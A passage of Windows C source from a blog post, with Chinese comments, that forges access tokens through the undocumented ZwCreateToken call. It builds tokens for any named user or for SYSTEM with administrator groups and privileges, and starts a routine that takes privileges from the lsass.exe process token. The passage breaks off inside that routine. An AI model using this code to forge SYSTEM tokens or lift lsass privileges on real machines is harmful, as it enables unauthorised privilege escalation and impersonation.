553![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
554
printf("pSecurityDescriptor1 is not a valid SD:%d\n",GetLastError());
555
return FALSE;
556
}
557![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
558
//给句柄设置新的ACL
559
if(!SetUserObjectSecurity(Hhandle,&sinfo,pSecurityDescriptor1))
560![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
561
printf("SetKernelObjectSecurity Error:%d\n",GetLastError());
562
return FALSE;
563
}
564
if(POldAcl)
565
LocalFree(POldAcl);
566
if(PNewAcl)
567
LocalFree(PNewAcl);
568
pfree(pSD);
569
pfree(pSecurityDescriptor1);
570
pfree(pDacl);
571
pfree(pSacl);
572
pfree(pOwner);
573
pfree(pPrimaryGroup);
574
return TRUE;
575
}
576![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
577
//根据指定用户名来建立Token
578
HANDLE NtCreateTokenAsuser(char *user)
579![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
580
SID *GroupSid,*UserSid;
581
char StringSid[SIZE],UserDefaultGroup[SIZE];
582
DWORD SidSize,GroupCount,GroupCount2,IsNotUsersGroup = 1;
583
char *DomainName,**UserGroup,*CurrentUser;
584
DWORD cbSid,cbDomainName,SessionId,sessionlen;
585
SID_NAME_USE peUse;
586
int ErrorCode,i;
587
LUID Luid = ANONYMOUS_LOGON_LUID;
588
//LUID Luid = SYSTEM_LUID;
589
SECURITY_QUALITY_OF_SERVICE security_quality_of_service =
590![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
591
sizeof( security_quality_of_service ),
592
SecurityAnonymous,
593
SECURITY_STATIC_TRACKING,
594
FALSE
595
};
596
OBJECT_ATTRIBUTES object_attributes =
597![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
598
sizeof( object_attributes ),
599
NULL,
600
NULL,
601
0,
602
NULL,
603
&security_quality_of_service
604
};
605![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
606
TOKEN_SOURCE token_source;
607
TOKEN_PRIVILEGES *token_privileges;
608
TOKEN_GROUPS *token_groups;
609
TOKEN_USER token_user;
610
TOKEN_OWNER token_owner;
611
TOKEN_PRIMARY_GROUP token_primary_group;
612
TOKEN_DEFAULT_DACL token_default_dacl,*SelfDacl;
613
ACL NewAcl2,*NewAcl;
614
TOKEN_TYPE tokentype;
615
HANDLE token,SelfToken;
616
NTSTATUS ntstatus,ntstatus2;
617
PNtCreateToken NtCreateToken;
618
HMODULE ntdllmodule;
619
ACCESS_MASK DesiredAccess;
620
LARGE_INTEGER ExpireTime;
621
EXPLICIT_ACCESS ExplicitAccess;
622
//给winstation用的
623
HDESK hdesk;
624
HWINSTA hwinsta;
625
DWORD PrivilegeCount;
626
//是否是SYSTEM用户
627
DWORD IfIsSystemUser = 0,IfIsAdmin = 0;
628
//定义结束
629![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
630
//获取CreateToken地址
631
ntdllmodule = GetModuleHandle("ntdll");
632
if(ntdllmodule == NULL )
633![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
634
printf("[-] GetModuleHandle ntdll error:%d\n",GetLastError());
635
return INVALID_HANDLE_VALUE;
636
}
637
NtCreateToken = (PNtCreateToken) GetProcAddress(ntdllmodule,"ZwCreateToken");
638
if(NtCreateToken == NULL)
639![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
640
printf("[-] GetProcAddress NtCreateToken error:%d\n",GetLastError());
641
return INVALID_HANDLE_VALUE;
642
}
643![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
644
if(stricmp(user,"system") == 0)
645![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
646
IfIsSystemUser = 1;
647
//Luid.LowPart = 0x3e7;
648
//Luid.HighPart = 0x0;
649
}
650
//arg 2 for NtCreateToken();
651
DesiredAccess = TOKEN_ALL_ACCESS;
652
//arg 3 for NtCreateToken();
653
//arg 4 for NtCreateToken();
654
//IN TOKEN_TYPE TokenType,
655
tokentype = TokenPrimary;
656
//arg 5 for NtCreateToken();
657
//memcpy(&Luid,&SYSTEM_LUID,sizeof(Luid));
658![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
659
if(!AllocateLocallyUniqueId(&Luid))
660
{
661
printf("AllocateLocallyUniqueId Failed:%d\n",GetLastError());
662
return INVALID_HANDLE_VALUE;
663
}
664
*/
665
//arg 6 for NtCreateToken();
666
ExpireTime.LowPart = 0xffffffff;
667
ExpireTime.HighPart = 0x7fffffff;
668
//printf("sizeof(ExpireTime) = %d\n",sizeof(ExpireTime));
669
//QueryPerformanceFrequency(&ExpireTime);
670
//arg 7 for NtCreateToken();
671
//token_user正确
672
token_user.User.Sid = GetUserSid(user);
673
if(token_user.User.Sid == NULL)
674
return INVALID_HANDLE_VALUE;
675
token_user.User.Attributes = 0; //must be 0
676
if(IfIsSystemUser == 0) //一般用户
677![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
678
//arg 8 for NtCreateToken();
679
if(!GetUserGroup(user,&UserGroup,&GroupCount))
680
return INVALID_HANDLE_VALUE;
681
//printf("=====================\nGet %d groups\n",GroupCount);
682
//给token_groups申请内存
683
//看用户组里面有没有"Users"
684
IsNotUsersGroup = 1;
685
for(i=0;i<GroupCount;i++)
686![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
687
CurrentUser = UserGroup[i];
688
if(stricmp(CurrentUser,"Users") == 0)
689![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
690
IsNotUsersGroup = 0;
691
continue;
692
}
693
if(stricmp(CurrentUser,"Administrators") == 0)
694![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
695
IfIsAdmin = 1;
696
continue;
697
}
698
}
699
//保存一下,后面要用
700
GroupCount2 = GroupCount;
701
//没有就+1,有就+0
702
GroupCount += IsNotUsersGroup + 2;
703
token_groups = (PTOKEN_GROUPS) malloc(4+(4+4)*GroupCount+1);
704
if(token_groups == NULL)
705![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
706
printf("Malloc for token_groups failed:%d\n",GetLastError());
707
return INVALID_HANDLE_VALUE;
708
}
709
//加"None","Everyone","INTERACTIVE" 组
710
//printf("GroupCount:%d\n",GroupCount);
711
token_groups->GroupCount = GroupCount;
712
//给第11个参数用
713
//memset(UserDefaultGroup,0,SIZE);
714
//strncpy(UserDefaultGroup,UserGroup[0],SIZE -1 );
715
//printf("GroupCount:%d\n",GroupCount);
716
//token_group需要最少加以下四个组:
717
//只有Users可能有用户或者帐号存在
718
//"None","Everyone","Users","INTERACTIVE"他们的ATTribute都是7
719
if(DebugLevel != 7)
720![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
721
printf("Using DebugLevel 0x%x \n",DebugLevel);
722
}
723
for(i=0;i<GroupCount2;i++)
724![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
725
//printf("%d:%s\n",i,UserGroup[i]);
726![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
727
CurrentUser = UserGroup[i];
728
GroupSid = GetUserSid(CurrentUser);
729
if(GroupSid == NULL)
730
return INVALID_HANDLE_VALUE;
731
token_groups->Groups[i].Sid = GroupSid;
732
token_groups->Groups[i].Attributes = DebugLevel;
733
free(CurrentUser);
734
}
735
free(UserGroup);
736![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
737
GroupSid = GetUserSid("None");
738
if(GroupSid == NULL)
739
return INVALID_HANDLE_VALUE;
740
token_groups->Groups[i].Sid = GroupSid;
741
token_groups->Groups[i++].Attributes = DebugLevel;
742
*/
743
GroupSid = GetUserSid("Everyone");
744
if(GroupSid == NULL)
745
return INVALID_HANDLE_VALUE;
746
token_groups->Groups[i].Sid = GroupSid;
747
token_groups->Groups[i++].Attributes = DebugLevel;
748![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
749
GroupSid = GetUserSid("INTERACTIVE");
750
if(GroupSid == NULL)
751
return INVALID_HANDLE_VALUE;
752
token_groups->Groups[i].Sid = GroupSid;
753
token_groups->Groups[i++].Attributes = DebugLevel;
754![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
755
if(IsNotUsersGroup)
756![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
757
GroupSid = GetUserSid("Users");
758
if(GroupSid == NULL)
759
return INVALID_HANDLE_VALUE;
760
token_groups->Groups[i].Sid = GroupSid;
761
token_groups->Groups[i++].Attributes = DebugLevel;
762
}
763
//arg 9 for NtCreateToken();
764
//这个倒没错
765
//先申请内存
766
if(IfIsAdmin == 0) //如果不是管理员组
767![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
768
PrivilegeCount = 2;
769
token_privileges = (PTOKEN_PRIVILEGES) malloc(4 + (3*4)*PrivilegeCount + 4);
770
if(token_privileges == NULL)
771![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
772
printf("malloc failed for PTOKEN_PRIVILEGES in NtCreateTokenAsuser\n");
773
return INVALID_HANDLE_VALUE;
774
}
775
token_privileges->PrivilegeCount = PrivilegeCount;
776
(token_privileges->Privileges)[0].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT;
777
(token_privileges->Privileges)[0].Luid = GetLuidFromText("SeChangeNotifyPrivilege");
778![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
779
(token_privileges->Privileges)[1].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT;
780
(token_privileges->Privileges)[1].Luid = GetLuidFromText("SeUndockPrivilege");
781
}
782
else
783![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
784
token_privileges = MakeAdminPriv();
785
if(token_privileges == NULL)
786
return INVALID_HANDLE_VALUE;
787
}
788![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
789
if(!AllocateLocallyUniqueId(&(token_privileges.Privileges[0].Luid)))
790
{
791
printf("AllocateLocallyUniqueId for token_privileges Failed:%d\n",GetLastError());
792
return INVALID_HANDLE_VALUE;
793
}
794
*/
795
//arg 10 for NtCreateToken();
796
//正确的方法
797
token_owner.Owner = GetUserSid(user);
798
if(token_owner.Owner == NULL)
799
return INVALID_HANDLE_VALUE;
800
//arg 11 for NtCreateToken();
801
//PrimaryGroup统一都是None
802
token_primary_group.PrimaryGroup = GetUserSid(user);
803
if(token_primary_group.PrimaryGroup == NULL)
804
return INVALID_HANDLE_VALUE;
805
}
806
else
807![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
808
//设置usergroup
809
//三个组:administrators(0xe),everyone(0x7),Authenticated Users(0x7)
810
GroupCount = 2;
811
token_groups = (PTOKEN_GROUPS) malloc(4+(4+4)*GroupCount+1);
812
if(token_groups == NULL)
813![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
814
printf("Malloc for token_groups failed:%d\n",GetLastError());
815
return INVALID_HANDLE_VALUE;
816
}
817
token_groups->GroupCount = GroupCount;
818
//自定义的debuglevel
819
if(DebugLevel != 7)
820![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
821
printf("Using DebugLevel 0x%x \n",DebugLevel);
822
}
823
i = 0;
824
GroupSid = GetUserSid("administrators");
825
if(GroupSid == NULL)
826
return INVALID_HANDLE_VALUE;
827
token_groups->Groups[i].Sid = GroupSid;
828
token_groups->Groups[i++].Attributes = 0xe;
829![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
830
GroupSid = GetUserSid("Everyone");
831
if(GroupSid == NULL)
832
return INVALID_HANDLE_VALUE;
833
token_groups->Groups[i].Sid = GroupSid;
834
token_groups->Groups[i++].Attributes = DebugLevel;
835![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
836
GroupSid = GetUserSid("Authenticated Users");
837
if(GroupSid == NULL)
838
return INVALID_HANDLE_VALUE;
839
token_groups->Groups[i].Sid = GroupSid;
840
token_groups->Groups[i++].Attributes = DebugLevel;
841
*/
842
//设置 token_privileges
843
token_privileges = MakeAdminPriv();
844
if(token_privileges == NULL)
845
return INVALID_HANDLE_VALUE;
846
//token_owner
847
token_owner.Owner = GetUserSid("administrators");
848
if(token_owner.Owner == NULL)
849
return INVALID_HANDLE_VALUE;
850
//arg 11 for NtCreateToken();
851
//PrimaryGroup统一都是None
852
token_primary_group.PrimaryGroup = GetUserSid("SYSTEM");
853
if(token_primary_group.PrimaryGroup == NULL)
854
return INVALID_HANDLE_VALUE;
855
}
856
//arg 12 for NtCreateToken();
857
//NULL?
858
//token_default_dacl
859![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
860
token_default_dacl->DefaultDacl->AclRevision:2
861
token_default_dacl->DefaultDacl->Sbz1:0
862
token_default_dacl->DefaultDacl->AclSize:64
863
token_default_dacl->DefaultDacl->AceCount:2
864
token_default_dacl->DefaultDacl->Sbz2:0
865
*/
866
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &SelfToken))
867![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
868
printf("OpenProcessToken self Error:%d\n",GetLastError());
869
return INVALID_HANDLE_VALUE;
870
}
871
BuildExplicitAccessWithName(&ExplicitAccess,user,GENERIC_ALL,GRANT_ACCESS,NO_INHERITANCE);
872
SelfDacl = (PTOKEN_DEFAULT_DACL) GetFromToken(SelfToken,TokenDefaultDacl);
873
if(SelfDacl == NULL)
874![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
875
CloseHandle(SelfToken);
876
return INVALID_HANDLE_VALUE;
877
}
878
ErrorCode = SetEntriesInAcl(1,&ExplicitAccess,SelfDacl->DefaultDacl,&NewAcl);
879
if(ErrorCode != ERROR_SUCCESS)
880![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
881
printf("SetEntriesInAcl Under NtCreateTokenAsuser Failed:%d\n",ErrorCode);
882
CloseHandle(SelfToken);
883
return INVALID_HANDLE_VALUE;
884
}
885
//获得当前进程的SessionID,然后再同样set到新的token里面
886
//printf("SelfProcess:\n");
887
//DisplayTokenSessionId(SelfToken);
888
//SessionId,sessionlen;
889
sessionlen = sizeof(DWORD);
890
if(!GetTokenInformation(SelfToken,TokenSessionId,&SessionId,sessionlen,&sessionlen))
891![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
892
printf("GetTokenInformation TokenSessionId Failed:%d\n",GetLastError());
893
CloseHandle(SelfToken);
894
return INVALID_HANDLE_VALUE;
895
}
896
CloseHandle(SelfToken);
897
token_default_dacl.DefaultDacl = NewAcl;
898![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
899
NewAcl2.AclRevision = 2;
900
NewAcl2.Sbz1 = 0;
901
NewAcl2.AclSize = 64;
902
NewAcl2.AceCount = 2;
903
NewAcl2.Sbz2 = 0;
904
ErrorCode = SetEntriesInAcl(0,NULL,NULL,&NewAcl);
905
if(ErrorCode != ERROR_SUCCESS)
906
{
907
printf("SetEntriesInAcl As new one failed:%d\n",ErrorCode);
908
return INVALID_HANDLE_VALUE;
909
}
910
token_default_dacl.DefaultDacl = NewAcl;
911
*/
912
//arg 13 for NtCreateToken();
913
//token_source
914
if(IfIsSystemUser == 0) //一般用户
915
memcpy(token_source.SourceName,"seclogon",8);
916
else
917
memcpy(token_source.SourceName,"*SYSTEM*",8);
918
//生成LUID
919
//token_source.SourceIdentifier = Luid;
920
if(!AllocateLocallyUniqueId(&(token_source.SourceIdentifier)))
921![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
922
printf("AllocateLocallyUniqueId for token_source Failed:%d\n",GetLastError());
923
return INVALID_HANDLE_VALUE;
924
}
925
if(IfIsSystemUser == 0)
926![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
927
//将该用户权限加入到当前用户所使用的 桌面 和 winstation
928
//hwinsta = OpenWindowStation("WinSta0",TRUE,WINSTA_ALL);
929
hwinsta = GetProcessWindowStation();
930
if (hwinsta == NULL)
931![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
932
printf("OpenWindowStation Error:%d\n",GetLastError());
933
return INVALID_HANDLE_VALUE;
934
}
935
//hwinstaold = GetProcessWindowStation();
936![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
937
//
938
// set the windowstation to winsta0 so that you obtain the
939
// correct default desktop
940
//
941![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
942
if (!SetProcessWindowStation(hwinsta))
943
{
944
printf("SetProcessWindowStation Error:%d\n",GetLastError());
945
CloseWindowStation(hwinsta);
946
return INVALID_HANDLE_VALUE;
947
}
948
*/
949
//
950
// obtain a handle to the "default" desktop
951
//
952
//hdesk = OpenDesktop("Default",DF_ALLOWOTHERACCOUNTHOOK,FALSE,DESKTOP_ALL);
953
hdesk = GetThreadDesktop(GetCurrentThreadId());
954
if (hdesk == NULL)
955![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
956
printf("OpenDesktop Error:%d\n",GetLastError());
957
CloseWindowStation(hwinsta);
958
return INVALID_HANDLE_VALUE;
959
}
960
// add the user to interactive windowstation
961
//
962
AddUserPrivToHandle(hwinsta,user,WINSTA_ALL);
963
AddUserPrivToHandle(hdesk,user,DESKTOP_ALL);
964![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
965
if (!AddTheAceWindowStation(hwinsta, token_user.User.Sid))
966
{
967
printf("AddTheAceWindowStation Error:%d\n",GetLastError());
968
CloseWindowStation(hwinsta);
969
CloseDesktop(hdesk);
970
return INVALID_HANDLE_VALUE;
971
}
972
//
973
// add user to "default" desktop
974
//
975
if (!AddTheAceDesktop(hdesk, token_user.User.Sid))
976
{
977
printf("AddTheAceDesktop Error:%d\n",GetLastError());
978
CloseWindowStation(hwinsta);
979
CloseDesktop(hdesk);
980
return INVALID_HANDLE_VALUE;
981
}
982
*/
983
if (!SetProcessWindowStation(hwinsta))
984![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
985
printf("SetProcessWindowStation Error:%d\n",GetLastError());
986
CloseWindowStation(hwinsta);
987
return INVALID_HANDLE_VALUE;
988
}
989
if(!SetThreadDesktop(hdesk))
990![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
991
printf("SetThreadDesktop Error:%d\n",GetLastError());
992
CloseDesktop(hdesk);
993
return INVALID_HANDLE_VALUE;
994
}
995
//
996
// close the handles to the interactive windowstation and desktop
997
//
998
CloseWindowStation(hwinsta);
999
CloseDesktop(hdesk);
1000
}
1001
//开始create
1002
ntstatus = NtCreateToken( &token,
1003
DesiredAccess,
1004
&object_attributes,
1005
tokentype,
1006
&Luid,
1007
&ExpireTime,
1008
&token_user,
1009
token_groups,
1010
token_privileges,
1011
&token_owner,
1012
&token_primary_group,
1013
&token_default_dacl,
1014
&token_source
1015
);
1016
if(ntstatus != STATUS_SUCCESS)
1017![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1018
printf("CreateToken Failed:%d\n",LsaNtStatusToWinError(ntstatus));
1019
return INVALID_HANDLE_VALUE;
1020
}
1021
//开始释放内存
1022![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
1023
pfree(token_user.User.Sid);
1024
pfree(token_groups);
1025
pfree(token_privileges);
1026
pfree(token_owner.Owner);
1027
pfree(token_primary_group.PrimaryGroup);
1028
if(NewAcl != NULL)
1029
LocalFree(NewAcl);
1030
*/
1031![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
1032
printf("NewToken:\n");
1033
DisplayTokenSessionId(token);
1034
*/
1035
if(TokenSessionId > 0)
1036![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1037
sessionlen = sizeof(DWORD);
1038
if(!SetTokenInformation(token,TokenSessionId,&SessionId,sessionlen))
1039![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1040
printf("SetTokenInformation TokenSessionId Failed:%d\n",GetLastError());
1041
}
1042
}
1043
return token;
1044
}
1045![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
1046![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
1047
//输出:指针指向一系列的group,groupcount为group数目.
1048
BOOL GetUserGroup(char *username,char ***groupname,int *groupcount)
1049![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
1050
LPLOCALGROUP_USERS_INFO_0 pBuf = NULL;
1051
DWORD dwLevel = 0;
1052
DWORD dwFlags = LG_INCLUDE_INDIRECT ;
1053
DWORD dwPrefMaxLen = -1;
1054
DWORD dwEntriesRead = 0;
1055
DWORD dwTotalEntries = 0;
1056
NET_API_STATUS nStatus;
1057
DWORD i;
1058
DWORD dwTotalCount = 0;
1059
WCHAR wUserName[100];//,wAdminGroup[50];
1060
BOOL returnvalue=FALSE;
1061
char *p;
1062
DWORD len;
1063
char **name;
1064![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
1065
MultiByteToWideChar( CP_ACP, 0, username,-1, wUserName,sizeof(wUserName)/sizeof(wUserName[0]));
1066
//MultiByteToWideChar( CP_ACP, 0, admingroup,-1, wAdminGroup,sizeof(wAdminGroup)/sizeof(wAdminGroup[0]));
1067![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
1068
nStatus = NetUserGetLocalGroups(NULL,wUserName,dwLevel,dwFlags,(LPBYTE *) &pBuf,dwPrefMaxLen,&dwEntriesRead,&dwTotalEntries);
1069![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
1070
if (nStatus != NERR_Success)
1071![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
1072
return returnvalue;
1073
}
1074
1075
if(pBuf == NULL)
1076
return returnvalue;
1077
1078![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
1079
name = (char **) malloc(dwEntriesRead * sizeof(char *));
1080
if(name == NULL)
1081![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1082
printf("malloc failed in GetUserGroup for name:%d\n",GetLastError());
1083
return returnvalue;
1084
}
1085
returnvalue = TRUE;
1086
for (i = 0; i < dwEntriesRead; i++)
1087![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1088
if (pBuf == NULL)
1089
return returnvalue;
1090
len = wcslen(pBuf->lgrui0_name);
1091
p = (char *) malloc(len+1);
1092
if(p == NULL)
1093![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1094
printf("malloc failed in GetUserGroup:%d\n",GetLastError());
1095
break;
1096
}
1097
wsprintf(p,"%S",pBuf->lgrui0_name);
1098
name[dwTotalCount] = p;
1099
//printf("%d:%s\n",dwTotalCount,p);
1100
pBuf++;
1101
dwTotalCount++;
1102
}
1103
if(pBuf != NULL)
1104
NetApiBufferFree(pBuf);
1105
*groupname = name;
1106
*groupcount = dwTotalCount;
1107
return returnvalue;
1108
}
1109
//加权限
1110
int GrantPriv(char *priv)
1111![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
1112
HANDLE token;
1113
TOKEN_PRIVILEGES tkp;
1114
HANDLE hProc;
1115![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
1116
//SeCreateTokenPrivilege
1117
if(LookupPrivilegeValue(NULL,priv,&tkp.Privileges[0].Luid) == FALSE)
1118![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1119
fprintf(stderr, "LookupPrivilegeValue failed: 0x%X\n", GetLastError());
1120
return(-1);
1121
}
1122
if(OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token) == FALSE)
1123![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1124
fprintf(stderr, "OpenProcessToken SELF Failed: 0x%X\n", GetLastError());
1125
return(-1);
1126
}
1127
tkp.PrivilegeCount = 1;
1128
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
1129
if(!AdjustTokenPrivileges(token,FALSE,&tkp,0,NULL, NULL))
1130![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1131
fprintf(stderr,"AdjustTokenPrivileges Failed: 0x%X\n", GetLastError());
1132
return(-1);
1133
}
1134![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
1135
else
1136
{
1137
switch(GetLastError())
1138
{
1139
case ERROR_SUCCESS:
1140
printf("The function adjusted all specified privileges.\n");
1141
break;
1142
case ERROR_NOT_ALL_ASSIGNED: //0x514
1143
printf("Adjust privileges not assigned\n");
1144
break;
1145
}
1146
}
1147
*/
1148
CloseHandle(token);
1149
return 0;
1150
}
1151![](//www.cppblog.com/Images/OutliningIndicators/None.gif)
1152
//从 lsass.exe 继承权限
1153
int GrantPrivFromLsass(int pid)
1154![](//www.cppblog.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedBlock.gif)
{
1155
HANDLE LsassHandle,LsassToken,NewToken;
1156![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
1157
//首先打开进程,获得HANDLE
1158
//PROCESS_QUERY_INFORMATION ,FALSE
1159
//LsassHandle = OpenProcess(PROCESS_ALL_ACCESS,TRUE,pid);
1160
LsassHandle = OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,pid);
1161
//在OpenProcessToken(READ|WRITE
1162
if(LsassHandle == NULL)
1163![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1164
printf("OpenProcess %d Error:%d\n",pid,GetLastError());
